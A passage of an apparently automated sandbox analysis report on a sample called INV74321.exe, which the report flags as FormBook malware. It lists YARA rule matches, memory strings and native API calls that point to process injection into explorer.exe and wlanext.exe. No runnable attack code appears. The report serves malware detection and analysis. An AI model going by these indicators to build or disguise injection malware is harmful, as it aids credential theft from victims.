          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000008.00000002.475299853.0000000003E62000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041826C NtReadFile,1_2_0041826C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B198F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B19860
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19840 NtDelayExecution,LdrInitializeThunk,1_2_00B19840
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199A0 NtCreateSection,LdrInitializeThunk,1_2_00B199A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B19910
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A20 NtResumeThread,LdrInitializeThunk,1_2_00B19A20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B19A00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A50 NtCreateFile,LdrInitializeThunk,1_2_00B19A50
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195D0 NtClose,LdrInitializeThunk,1_2_00B195D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19540 NtReadFile,LdrInitializeThunk,1_2_00B19540
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B196E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B19660
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B197A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B19780
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B19FE0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B19710
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198A0 NtWriteVirtualMemory,1_2_00B198A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19820 NtEnumerateKey,1_2_00B19820
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1B040 NtSuspendThread,1_2_00B1B040
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199D0 NtCreateProcessEx,1_2_00B199D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19950 NtQueueApcThread,1_2_00B19950
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A80 NtOpenDirectoryObject,1_2_00B19A80
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A10 NtQuerySection,1_2_00B19A10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A3B0 NtGetContextThread,1_2_00B1A3B0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19B00 NtSetValueKey,1_2_00B19B00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195F0 NtQueryInformationFile,1_2_00B195F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1AD30 NtSetContextThread,1_2_00B1AD30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19520 NtWaitForSingleObject,1_2_00B19520
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19560 NtWriteFile,1_2_00B19560
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196D0 NtCreateKey,1_2_00B196D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19610 NtEnumerateValueKey,1_2_00B19610
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19670 NtQueryInformationProcess,1_2_00B19670
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19650 NtQueryValueKey,1_2_00B19650
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19730 NtQueryVirtualMemory,1_2_00B19730
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A710 NtOpenProcessToken,1_2_00B1A710
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19770 NtSetInformationFile,1_2_00B19770
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A770 NtOpenThread,1_2_00B1A770
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19760 NtOpenProcess,1_2_00B19760
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181BA NtCreateFile,1_1_004181BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041826C NtReadFile,1_1_0041826C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182EA NtClose,1_1_004182EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A50 NtCreateFile,LdrInitializeThunk,8_2_03789A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03789910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899A0 NtCreateSection,LdrInitializeThunk,8_2_037899A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03789860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789840 NtDelayExecution,LdrInitializeThunk,8_2_03789840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789710 NtQueryInformationToken,LdrInitializeThunk,8_2_03789710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789FE0 NtCreateMutant,LdrInitializeThunk,8_2_03789FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789780 NtMapViewOfSection,LdrInitializeThunk,8_2_03789780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03789660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789650 NtQueryValueKey,LdrInitializeThunk,8_2_03789650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_037896E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896D0 NtCreateKey,LdrInitializeThunk,8_2_037896D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789540 NtReadFile,LdrInitializeThunk,8_2_03789540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895D0 NtClose,LdrInitializeThunk,8_2_037895D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789B00 NtSetValueKey,8_2_03789B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A3B0 NtGetContextThread,8_2_0378A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A20 NtResumeThread,8_2_03789A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A10 NtQuerySection,8_2_03789A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A00 NtProtectVirtualMemory,8_2_03789A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A80 NtOpenDirectoryObject,8_2_03789A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789950 NtQueueApcThread,8_2_03789950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899D0 NtCreateProcessEx,8_2_037899D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378B040 NtSuspendThread,8_2_0378B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789820 NtEnumerateKey,8_2_03789820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898F0 NtReadVirtualMemory,8_2_037898F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898A0 NtWriteVirtualMemory,8_2_037898A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A770 NtOpenThread,8_2_0378A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789770 NtSetInformationFile,8_2_03789770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789760 NtOpenProcess,8_2_03789760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789730 NtQueryVirtualMemory,8_2_03789730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A710 NtOpenProcessToken,8_2_0378A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037897A0 NtUnmapViewOfSection,8_2_037897A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789670 NtQueryInformationProcess,8_2_03789670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789610 NtEnumerateValueKey,8_2_03789610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789560 NtWriteFile,8_2_03789560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378AD30 NtSetContextThread,8_2_0378AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789520 NtWaitForSingleObject,8_2_03789520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895F0 NtQueryInformationFile,8_2_037895F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C83A0 NtAllocateVirtualMemory,8_2_030C83A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C8270 NtReadFile,8_2_030C8270
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82F0 NtClose,8_2_030C82F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81C0 NtCreateFile,8_2_030C81C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C826C NtReadFile,8_2_030C826C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82EA NtClose,8_2_030C82EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81BA NtCreateFile,8_2_030C81BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004069450_2_00406945
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040711C0_2_0040711C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00408C5B1_2_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041C5381_2_0041C538
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041C7A01_2_0041C7A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A01_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA20A81_2_00BA20A8
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB0901_2_00AEB090
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B910021_2_00B91002
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF41201_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADF9001_2_00ADF900
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA22AE1_2_00BA22AE
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0EBB01_2_00B0EBB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9DBD21_2_00B9DBD2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2B281_2_00BA2B28
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE841F1_2_00AE841F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B025811_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E01_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA25DD1_2_00BA25DD
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD0D201_2_00AD0D20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2D071_2_00BA2D07
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1D551_2_00BA1D55
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA2EF71_2_00BA2EF7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF6E301_2_00AF6E30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1FF11_2_00BA1FF1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00408C5B1_1_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00408C601_1_00408C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380DBD28_2_0380DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812B288_2_03812B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377EBB08_2_0377EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038122AE8_2_038122AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037641208_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F9008_2_0374F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038120A88_2_038120A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038128EC8_2_038128EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038010028_2_03801002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381E8248_2_0381E824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A08_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B0908_2_0375B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381DFCE8_2_0381DFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811FF18_2_03811FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03766E308_2_03766E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812EF78_2_03812EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380D6168_2_0380D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03740D208_2_03740D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038125DD8_2_038125DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03812D078_2_03812D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E08_2_0375D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811D558_2_03811D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037725818_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375841F8_2_0375841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380D4668_2_0380D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC7A08_2_030CC7A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2FB08_2_030B2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC5388_2_030CC538
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2D898_2_030B2D89
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B2D908_2_030B2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B8C5B8_2_030B8C5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030B8C608_2_030B8C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0374B150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 0041A0A0 appears 38 times
          Source: INV74321.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INV74321.exe, 00000000.00000003.208336740.0000000002C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000000.00000002.221214353.0000000000A70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257734527.0000000000D5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257457719.0000000000A62000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs INV74321.exe
          Source: INV74321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
